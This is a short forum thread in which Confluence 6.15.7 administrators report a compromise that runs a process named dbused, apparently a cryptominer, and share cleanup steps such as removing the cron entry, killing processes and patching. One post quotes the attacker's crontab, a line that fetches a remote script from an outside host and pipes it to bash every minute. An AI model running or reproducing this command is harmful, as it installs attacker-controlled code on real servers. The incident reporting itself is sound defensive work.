Today, we saw a weird behaviour in our confluence in that dbused command is constantly executed in os system.
we see in this link https://community.atlassian.com/t5/Confluence-questions/No-access-to-Conlfuence-Webpage-100-CPU-usage-from-quot-dbused/qaq-p/1793393#U1793634
that is a problem in various confluence. we found a crontab that get a URL and allow it delete
do you have a solutions for this problem?
we had confluence 6.15.7
Virus
/var/spool/cron/crontabs/confluence
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Sep 1 18:32:32 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib3 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms
~
Same here. I remove the crontab entry (found in /var/spool/cron/confluence), yet the crontab regenerates.
Hey Gustavo,
after some time struggling, it seems that, at least for some time, I have managed to shut the miner, or whatever it was, down, and get Confluence running. What I did I did in a very short time window.
1) I removed the cron entry for confluence, which was located in /var/spool/cron
2) I killed all the suspicious processes, like the dbused
3) I applied Atlassian's patch.
From then, dbuserd didn't start, nor did the cronfile generate again.
Finally, I removed all the suspicious files from /tmp.
I'm now going to apply the LTE version.
Same here, thanks for help.
Some files are set with chattr flags and harder to remove.
It looks like you're new here. Sign in or register to get started.